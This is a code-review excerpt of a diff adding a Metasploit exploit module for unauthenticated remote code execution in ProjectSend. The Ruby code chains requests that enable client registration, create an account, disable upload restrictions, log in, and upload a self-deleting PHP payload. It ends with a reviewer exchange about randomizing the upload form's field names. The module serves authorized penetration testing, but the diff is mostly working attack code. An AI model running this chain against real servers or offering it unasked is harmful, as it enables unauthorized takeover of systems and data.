modules/exploits/linux/http/projectsend_unauth_rce.rb

```diff
@@ -0,0 +1,388 @@
+      'cookie' => phpsessid,
+      'vars_post' => params
+    })
+
+    # Check if we successfully enable client registration
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php')
+    })
+
+    register_regex = /(.*?)Register as a new client./
+    if res.body[register_regex, 1]
+      print_good('Client registration successfully enabled')
+    else
+      fail_with(Failure::Unknown, 'Could not enable client registration')
+    end
+  end
+
+  def register_new_user(username, password)
+    csrf_token, phpsessid = get_csrf_and_session_id
+
+    # Create a new user with the previously generated username and password
+    params = {
+      'csrf_token' => csrf_token,
+      'name' => username,
+      'username' => username,
+      'password' => password,
+      'email' => Rex::Text.rand_mail_address,
+      'address' => Rex::Text.rand_text_alphanumeric(8)
+    }
+    
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(datastore['TARGETURI'], 'register.php'),
+        'cookie' => phpsessid,
+        'vars_post' => params
+      })
+    
+    if res.code != 403
+      print_good("User #{username} created with password #{password}")
+    else
+      fail_with(Failure::Unknown, 'Could not create a new user')
+    end
+  end
+
+  def disable_upload_restrictions
+    csrf_token, phpsessid = get_csrf_and_session_id
+
+    print_status('Disabling upload restrictions...')
+
+    # Disable upload restrictions, to allow us to upload our shell
+    params = {
+      'csrf_token' => csrf_token,
+      'section' => 'security',
+      'file_types_limit_to' => 'noone'
+    }
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'options.php'),
+      'cookie' => phpsessid,
+      'vars_post' => params
+    })
+  end
+
+  def login_and_upload(username, password, filename)
+    csrf_token, phpsessid = get_csrf_and_session_id
+
+    print_status("Logging in as #{username}...")
+
+    # Attempt to login as our newly created user
+    params = {
+      'csrf_token' => csrf_token,
+      'do' => 'login',
+      'username' => username,
+      'password' => password
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], 'index.php'),
+      'cookie' => phpsessid,
+      'vars_post' => params,
+      'keep_cookies' => true
+    })
+
+    if res && res.headers['Set-Cookie']
+      print_good("Logged in as #{username}")
+    else
+      fail_with(Failure::NoAccess, 'Failed to authenticate. This can happen, you should try to execute the exploit again')
+    end
+
+    # Craft the payload
+    payload = get_write_exec_payload(unlink_self: true)
+    data = Rex::MIME::Message.new
+    data.add_part(filename, nil, nil, 'form-data; name="name"')
+    data.add_part(payload, 'application/octet-stream', nil, 'form-data; name="file"; filename="blob"')
```

Comment:
Can any of these be randomized? `name` / `file` / `blob`?

Reply:
`blob` could be randomized.